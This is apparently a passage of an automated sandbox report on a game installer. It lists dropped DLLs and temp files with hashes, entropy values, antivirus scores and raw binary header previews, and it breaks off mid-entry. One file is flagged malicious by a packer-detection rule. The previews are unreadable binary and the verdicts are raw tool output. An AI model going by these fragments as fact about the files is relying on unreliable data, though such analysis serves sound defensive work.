SHA-256:	7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:	A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.423554884287906
Encrypted:	false
SSDEEP:	6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:	67247C0ACA089BDE943F802BFBA8752C
SHA1:	508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:	BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:	C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	62478
Entropy (8bit):	6.063363187934607
Encrypted:	false
SSDEEP:	768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:	940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:	0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:	B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:	50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..\|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..\|....P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-0T8SC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36416
Entropy (8bit):	7.842278356440954
Encrypted:	false
SSDEEP:	768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:	BEBA64522AA8265751187E38D1FC0653
SHA1:	63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:	8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:	13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

C:\Program Files (x86)\CRTGame\bin\x86\is-0U5DK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-1BOH7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\CRTGame\bin\x86\is-2AGLA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-2ASPL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-3DI9V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31936
Entropy (8bit):	6.6461204214578
Encrypted:	false
SSDEEP:	768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:	72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:	A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:	7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:	A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-40RRA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\CRTGame\bin\x86\is-5L10M.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17472
Entropy (8bit):	7.524548435291935
Encrypted:	false
SSDEEP:	384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:	7B52BE6D702AA590DB57A0E135F81C45
SHA1:	518FB84C77E547DD73C335D2090A35537111F837
SHA-256:	9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:	79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........\|...CC.......p......n....<.......`..............lH......)...............

C:\Program Files (x86)\CRTGame\bin\x86\is-6I8EB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\CRTGame\bin\x86\is-9BPJ8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	845312
Entropy (8bit):	6.581151900686739
Encrypted:	false
SSDEEP:	24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
MD5:	00C672988C2B0A2CB818F4D382C1BE5D
SHA1:	57121C4852B36746146B10B5B97B5A76628F385F
SHA-256:	4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
SHA-512:	C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-A2FB0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-AKTO1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	26526
Entropy (8bit):	4.600837395607617
Encrypted:	false
SSDEEP:	384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:	BD7A443320AF8C812E4C18D1B79DF004
SHA1:	37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:	B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:	21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:	false
Preview:	GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

C:\Program Files (x86)\CRTGame\bin\x86\is-B6UBH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-B7IAM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	197646
Entropy (8bit):	6.1570532273946625
Encrypted:	false
SSDEEP:	3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:	2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:	64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:	DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:	488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\is-BEPVB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
